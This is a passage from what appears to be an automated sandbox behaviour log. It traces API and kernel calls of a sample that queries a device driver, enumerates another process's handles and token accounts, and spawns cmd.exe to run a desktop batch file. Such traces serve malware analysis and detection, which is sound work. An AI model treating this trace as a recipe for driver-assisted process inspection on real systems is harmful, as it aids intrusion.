cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0292.288] CloseHandle (hObject=0x18c) returned 1 [0292.288] CloseHandle (hObject=0x188) returned 1 [0292.288] PsLookupProcessByProcessId (in: ProcessId=0x96c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.288] PsAcquireProcessExitSynchronization () returned 0x0 [0292.288] KeStackAttachProcess (in: PROCESS=0xffffe000684f1840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000684f1840, ApcState=0xffffd000ac0cf400) [0292.288] ObReferenceObjectByHandle (in: Handle=0x4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000690c13a0, HandleInformation=0x0) returned 0x0 [0292.288] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.288] PsReleaseProcessExitSynchronization () returned 0x2 [0292.288] ObfDereferenceObject (Object=0xffffe000684f1840) returned 0x2ffef [0292.288] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a6a57c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a57c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.288] ObfDereferenceObject (Object=0xffffe000690c13a0) returned 0xfffc [0292.288] IoCompleteRequest () returned 0x0 [0292.288] PsLookupProcessByProcessId (in: ProcessId=0x96c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.288] PsAcquireProcessExitSynchronization () returned 0x0 [0292.288] KeStackAttachProcess (in: PROCESS=0xffffe000684f1840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000684f1840, ApcState=0xffffd000ac0cf400) [0292.288] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006914ecc0, HandleInformation=0x0) returned 0x0 [0292.288] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.288] PsReleaseProcessExitSynchronization () returned 0x2 [0292.288] ObfDereferenceObject (Object=0xffffe000684f1840) returned 0x2ffee [0292.288] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00069f22044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00069f22044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.288] ObfDereferenceObject (Object=0xffffe0006914ecc0) returned 0x7fff [0292.288] IoCompleteRequest () returned 0x0 [0292.288] PsLookupProcessByProcessId (in: ProcessId=0x96c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.288] PsAcquireProcessExitSynchronization () returned 0x0 [0292.288] KeStackAttachProcess (in: PROCESS=0xffffe000684f1840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000684f1840, ApcState=0xffffd000ac0cf400) [0292.288] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a3ccd00, HandleInformation=0x0) returned 0x0 [0292.289] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.289] PsReleaseProcessExitSynchronization () returned 0x2 [0292.289] ObfDereferenceObject (Object=0xffffe000684f1840) returned 0x2ffed [0292.289] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe00068415044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe00068415044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.289] ObfDereferenceObject (Object=0xffffe0006a3ccd00) returned 0x7fff [0292.289] IoCompleteRequest () returned 0x0 [0292.289] PsLookupProcessByProcessId (in: ProcessId=0x96c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.289] PsAcquireProcessExitSynchronization () returned 0x0 [0292.289] KeStackAttachProcess (in: PROCESS=0xffffe000684f1840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000684f1840, ApcState=0xffffd000ac0cf400) [0292.289] ObReferenceObjectByHandle (in: Handle=0x30, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069174a90, HandleInformation=0x0) returned 0x0 [0292.289] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.289] PsReleaseProcessExitSynchronization () returned 0x2 [0292.289] ObfDereferenceObject (Object=0xffffe000684f1840) returned 0x2ffec [0292.289] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a6c2044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6c2044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.289] ObfDereferenceObject (Object=0xffffe00069174a90) returned 0x7ffd [0292.289] IoCompleteRequest () returned 0x0 [0292.289] PsLookupProcessByProcessId (in: ProcessId=0x96c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.289] PsAcquireProcessExitSynchronization () returned 0x0 [0292.289] KeStackAttachProcess (in: PROCESS=0xffffe000684f1840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000684f1840, ApcState=0xffffd000ac0cf400) [0292.289] ObReferenceObjectByHandle (in: Handle=0x38, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006940c090, HandleInformation=0x0) returned 0x0 [0292.289] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.289] PsReleaseProcessExitSynchronization () returned 0x2 [0292.289] ObfDereferenceObject (Object=0xffffe000684f1840) returned 0x2ffeb [0292.289] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006840e044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006840e044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.289] ObfDereferenceObject (Object=0xffffe0006940c090) returned 0xfffc [0292.289] IoCompleteRequest () returned 0x0 [0292.289] PsLookupProcessByProcessId (in: ProcessId=0x96c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.289] PsAcquireProcessExitSynchronization () returned 0x0 [0292.289] KeStackAttachProcess (in: PROCESS=0xffffe000684f1840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000684f1840, ApcState=0xffffd000ac0cf400) [0292.289] ObReferenceObjectByHandle (in: Handle=0x3c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000693fa090, HandleInformation=0x0) returned 0x0 [0292.289] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.289] PsReleaseProcessExitSynchronization () returned 0x2 [0292.289] ObfDereferenceObject (Object=0xffffe000684f1840) returned 0x2ffea [0292.289] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a65f7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a65f7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.289] ObfDereferenceObject (Object=0xffffe000693fa090) returned 0x1fff7 [0292.289] IoCompleteRequest () returned 0x0 [0292.289] PsLookupProcessByProcessId (in: ProcessId=0x96c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.289] PsAcquireProcessExitSynchronization () returned 0x0 [0292.289] KeStackAttachProcess (in: PROCESS=0xffffe000684f1840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000684f1840, ApcState=0xffffd000ac0cf400) [0292.289] ObReferenceObjectByHandle (in: Handle=0x40, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000693fa090, HandleInformation=0x0) returned 0x0 [0292.289] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.289] PsReleaseProcessExitSynchronization () returned 0x2 [0292.289] ObfDereferenceObject (Object=0xffffe000684f1840) returned 0x2ffe9 [0292.289] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a7c6044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a7c6044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.289] ObfDereferenceObject (Object=0xffffe000693fa090) returned 0x1fff6 [0292.289] IoCompleteRequest () returned 0x0 [0292.290] PsLookupProcessByProcessId (in: ProcessId=0x96c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.290] PsAcquireProcessExitSynchronization () returned 0x0 [0292.290] KeStackAttachProcess (in: PROCESS=0xffffe000684f1840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000684f1840, ApcState=0xffffd000ac0cf400) [0292.290] ObReferenceObjectByHandle (in: Handle=0x8c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000694eedd0, HandleInformation=0x0) returned 0x0 [0292.290] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.290] PsReleaseProcessExitSynchronization () returned 0x2 [0292.290] ObfDereferenceObject (Object=0xffffe000684f1840) returned 0x2ffe8 [0292.290] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a3d87c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a3d87c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.290] ObfDereferenceObject (Object=0xffffe000694eedd0) returned 0x7fff [0292.290] IoCompleteRequest () returned 0x0 [0292.290] PsLookupProcessByProcessId (in: ProcessId=0x96c, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.290] PsAcquireProcessExitSynchronization () returned 0x0 [0292.290] KeStackAttachProcess (in: PROCESS=0xffffe000684f1840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000684f1840, ApcState=0xffffd000ac0cf400) [0292.290] ObReferenceObjectByHandle (in: Handle=0xd4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006e2e7090, HandleInformation=0x0) returned 0x0 [0292.290] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.290] PsReleaseProcessExitSynchronization () returned 0x2 [0292.290] ObfDereferenceObject (Object=0xffffe000684f1840) returned 0x2ffe7 [0292.290] ObQueryNameString (in: Object=0xffffe0006e2e7090, ObjectNameInfo=0xffffe0006a6b37c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a6b37c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0292.290] ObfDereferenceObject (Object=0xffffe0006e2e7090) returned 0x7fff [0292.290] IoCompleteRequest () returned 0x0 [0292.290] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xde8) returned 0x0 [0292.290] PsLookupProcessByProcessId (in: ProcessId=0xde8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0xc000000b [0292.290] IoCompleteRequest () returned 0x0 [0292.290] PsLookupProcessByProcessId (in: ProcessId=0xde8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0xc000000b [0292.290] IoCompleteRequest () returned 0x0 [0292.290] PsLookupProcessByProcessId (in: ProcessId=0xde8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0xc000000b [0292.290] IoCompleteRequest () returned 0x0 [0292.290] PsLookupProcessByProcessId (in: ProcessId=0xde8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0xc000000b [0292.290] IoCompleteRequest () returned 0x0 [0292.290] PsLookupProcessByProcessId (in: ProcessId=0xde8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0xc000000b [0292.290] IoCompleteRequest () returned 0x0 [0292.290] PsLookupProcessByProcessId (in: ProcessId=0xde8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0xc000000b [0292.290] IoCompleteRequest () returned 0x0 [0292.290] PsLookupProcessByProcessId (in: ProcessId=0xde8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0xc000000b [0292.290] IoCompleteRequest () returned 0x0 [0292.290] PsLookupProcessByProcessId (in: ProcessId=0xde8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0xc000000b [0292.290] IoCompleteRequest () returned 0x0 [0292.291] PsLookupProcessByProcessId (in: ProcessId=0xde8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0xc000000b [0292.291] IoCompleteRequest () returned 0x0 [0292.291] PsLookupProcessByProcessId (in: ProcessId=0xde8, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0xc000000b [0292.291] IoCompleteRequest () returned 0x0 [0292.291] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x834) returned 0x188 [0292.291] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0292.291] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe0006a44d840, HandleInformation=0x0) returned 0x0 [0292.291] ObOpenObjectByPointer (in: Object=0xffffe0006a44d840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff800006fc) returned 0x0 [0292.291] ObfDereferenceObject (Object=0xffffe0006a44d840) returned 0x2fffc [0292.291] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800006fc, DesiredAccess=0x8, TokenHandle=0xffffe0006a430a00 | out: TokenHandle=0xffffe0006a430a00*=0x18c) returned 0x0 [0292.291] ZwClose (Handle=0xffffffff800006fc) returned 0x0 [0292.291] IoCompleteRequest () returned 0x0 [0292.291] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0292.291] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0xf7)), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="CIiHmnxMn6Ps", cchName=0x14d3c0, ReferencedDomainName="LHNIWSJ", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0292.291] CloseHandle (hObject=0x18c) returned 1 [0292.292] CloseHandle (hObject=0x188) returned 1 [0292.292] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.292] PsAcquireProcessExitSynchronization () returned 0x0 [0292.292] KeStackAttachProcess (in: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400) [0292.292] ObReferenceObjectByHandle (in: Handle=0x4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000691aef20, HandleInformation=0x0) returned 0x0 [0292.292] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.292] PsReleaseProcessExitSynchronization () returned 0x2 [0292.292] ObfDereferenceObject (Object=0xffffe0006a44d840) returned 0x27ffa [0292.292] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a6a1044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6a1044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.292] ObfDereferenceObject (Object=0xffffe000691aef20) returned 0x1fff9 [0292.292] IoCompleteRequest () returned 0x0 [0292.292] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.292] PsAcquireProcessExitSynchronization () returned 0x0 [0292.292] KeStackAttachProcess (in: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400) [0292.292] ObReferenceObjectByHandle (in: Handle=0x8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a6c2f20, HandleInformation=0x0) returned 0x0 [0292.292] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.292] PsReleaseProcessExitSynchronization () returned 0x2 [0292.292] ObfDereferenceObject (Object=0xffffe0006a44d840) returned 0x27ff9 [0292.292] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a717044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a717044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.292] ObfDereferenceObject (Object=0xffffe0006a6c2f20) returned 0x1fff1 [0292.292] IoCompleteRequest () returned 0x0 [0292.292] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.292] PsAcquireProcessExitSynchronization () returned 0x0 [0292.292] KeStackAttachProcess (in: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400) [0292.292] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000693bc830, HandleInformation=0x0) returned 0x0 [0292.292] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.292] PsReleaseProcessExitSynchronization () returned 0x2 [0292.292] ObfDereferenceObject (Object=0xffffe0006a44d840) returned 0x27ff8 [0292.292] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe0006a625044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a625044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.292] ObfDereferenceObject (Object=0xffffe000693bc830) returned 0x17ff7 [0292.292] IoCompleteRequest () returned 0x0 [0292.292] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.292] PsAcquireProcessExitSynchronization () returned 0x0 [0292.292] KeStackAttachProcess (in: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400) [0292.292] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00068a4f9f0, HandleInformation=0x0) returned 0x0 [0292.292] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.292] PsReleaseProcessExitSynchronization () returned 0x2 [0292.292] ObfDereferenceObject (Object=0xffffe0006a44d840) returned 0x27ff7 [0292.292] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a351044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a351044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.292] ObfDereferenceObject (Object=0xffffe00068a4f9f0) returned 0x37f8c [0292.292] IoCompleteRequest () returned 0x0 [0292.292] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.292] PsAcquireProcessExitSynchronization () returned 0x0 [0292.292] KeStackAttachProcess (in: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400) [0292.293] ObReferenceObjectByHandle (in: Handle=0x20, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000694ef090, HandleInformation=0x0) returned 0x0 [0292.293] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.293] PsReleaseProcessExitSynchronization () returned 0x2 [0292.293] ObfDereferenceObject (Object=0xffffe0006a44d840) returned 0x27ff6 [0292.293] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a5317c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5317c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.293] ObfDereferenceObject (Object=0xffffe000694ef090) returned 0x7fff [0292.293] IoCompleteRequest () returned 0x0 [0292.293] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.293] PsAcquireProcessExitSynchronization () returned 0x0 [0292.293] KeStackAttachProcess (in: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400) [0292.293] ObReferenceObjectByHandle (in: Handle=0x24, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000694ee4b0, HandleInformation=0x0) returned 0x0 [0292.293] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.293] PsReleaseProcessExitSynchronization () returned 0x2 [0292.293] ObfDereferenceObject (Object=0xffffe0006a44d840) returned 0x27ff5 [0292.293] ObQueryNameString (in: Object=0xffffe00069e11060, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.293] ObfDereferenceObject (Object=0xffffe000694ee4b0) returned 0x7ffe [0292.293] IoCompleteRequest () returned 0x0 [0292.293] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.293] PsAcquireProcessExitSynchronization () returned 0x0 [0292.293] KeStackAttachProcess (in: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400) [0292.293] ObReferenceObjectByHandle (in: Handle=0x6c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006f7fb690, HandleInformation=0x0) returned 0x0 [0292.293] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.293] PsReleaseProcessExitSynchronization () returned 0x2 [0292.293] ObfDereferenceObject (Object=0xffffe0006a44d840) returned 0x27ff4 [0292.293] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a721044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a721044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.293] ObfDereferenceObject (Object=0xffffe0006f7fb690) returned 0x8000 [0292.293] IoCompleteRequest () returned 0x0 [0292.293] PsLookupProcessByProcessId (in: ProcessId=0x834, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0292.293] PsAcquireProcessExitSynchronization () returned 0x0 [0292.294] KeStackAttachProcess (in: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe0006a44d840, ApcState=0xffffd000ac0cf400) [0292.294] ObReferenceObjectByHandle (in: Handle=0x14c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006f7fba60, HandleInformation=0x0) returned 0x0 [0292.294] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0292.294] PsReleaseProcessExitSynchronization () returned 0x2 [0292.294] ObfDereferenceObject (Object=0xffffe0006a44d840) returned 0x27ff3 [0292.294] ObQueryNameString (in: Object=0xffffe0006a372e40, ObjectNameInfo=0xffffe0006a5457c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a5457c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0292.294] ObfDereferenceObject (Object=0xffffe0006f7fba60) returned 0x7aef [0292.294] IoCompleteRequest () returned 0x0 [0292.294] GetLastError () returned 0x57 [0292.294] SetLastError (dwErrCode=0x57) [0292.294] GetLastError () returned 0x57 [0292.294] SetLastError (dwErrCode=0x57) [0292.294] GetLastError () returned 0x57 [0292.294] SetLastError (dwErrCode=0x57) [0292.294] GetVersion () returned 0x23f00206 [0292.294] GetStdHandle (nStdHandle=0xfffffff5) returned 0xc [0292.294] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xc, lpConsoleScreenBufferInfo=0x14fec0 | out: lpConsoleScreenBufferInfo=0x14fec0) returned 0 [0292.294] WriteFile (in: hFile=0xc, lpBuffer=0x14e900*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x14e220, lpOverlapped=0x0 | out: lpBuffer=0x14e900*, lpNumberOfBytesWritten=0x14e220*=0x1d, lpOverlapped=0x0) returned 1 [0292.295] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x14feb8 | out: phModule=0x14feb8) returned 0 [0292.295] ExitProcess (uExitCode=0x1) [0292.888] IoCompleteRequest () returned 0x0 Thread: id = 949 os_tid = 0x3e4 Process: id = "126" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x648a8000" os_pid = "0x6e0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xbd0" cmd_line = "C:\\Windows\\system32\\cmd.exe /c \"\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\" \"C:\\Program Files\\Windows Mail\\wabmig.exe\"\"" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8947 start_va = 0x6d0000 end_va = 0x6effff entry_point = 0x0 region_type = private name = "private_0x00000000006d0000" filename = "" Region: id = 8948 start_va = 0x6f0000 end_va = 0x6f1fff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 8949 start_va = 0x700000 end_va = 0x713fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 8950 start_va = 0x720000 end_va = 0x75ffff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 8951 start_va = 0x760000 end_va = 0x85ffff entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 8952 start_va = 0x860000 end_va = 0x863fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000860000" filename = "" Region: id = 8953 start_va = 0x13d0000 end_va = 0x141ffff entry_point = 0x13d0000 